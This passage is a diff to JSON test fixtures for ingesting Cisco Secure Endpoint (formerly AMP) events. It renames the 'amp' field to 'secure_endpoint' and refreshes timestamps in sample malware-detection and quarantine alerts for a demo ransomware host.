-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6181,7 +6181,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510470729Z",
+                "ingested": "2021-09-27T00:41:33.421058225Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6191,7 +6191,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6256,7 +6256,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510472598Z",
+                "ingested": "2021-09-27T00:41:33.421059970Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6266,7 +6266,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6331,7 +6331,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510474450Z",
+                "ingested": "2021-09-27T00:41:33.421061745Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6341,7 +6341,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6406,7 +6406,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510476347Z",
+                "ingested": "2021-09-27T00:41:33.421063478Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6416,7 +6416,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6502,7 +6502,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510478192Z",
+                "ingested": "2021-09-27T00:41:33.421065230Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -6513,7 +6513,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -6602,7 +6602,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510480074Z",
+                "ingested": "2021-09-27T00:41:33.421066971Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -6613,7 +6613,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -6691,7 +6691,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510481931Z",
+                "ingested": "2021-09-27T00:41:33.421068709Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -6702,7 +6702,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -6764,7 +6764,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510483781Z",
+                "ingested": "2021-09-27T00:41:33.421070451Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -6774,7 +6774,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6835,7 +6835,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510485650Z",
+                "ingested": "2021-09-27T00:41:33.421072188Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6845,7 +6845,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6910,7 +6910,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510487525Z",
+                "ingested": "2021-09-27T00:41:33.421073943Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6920,7 +6920,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -6985,7 +6985,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510489390Z",
+                "ingested": "2021-09-27T00:41:33.421075665Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6995,7 +6995,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -7076,7 +7076,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510491236Z",
+                "ingested": "2021-09-27T00:41:33.421086725Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7087,7 +7087,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7165,7 +7165,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510493135Z",
+                "ingested": "2021-09-27T00:41:33.421088660Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7176,7 +7176,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7254,7 +7254,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510494993Z",
+                "ingested": "2021-09-27T00:41:33.421090483Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7265,7 +7265,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -7343,7 +7343,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510496868Z",
+                "ingested": "2021-09-27T00:41:33.421092286Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d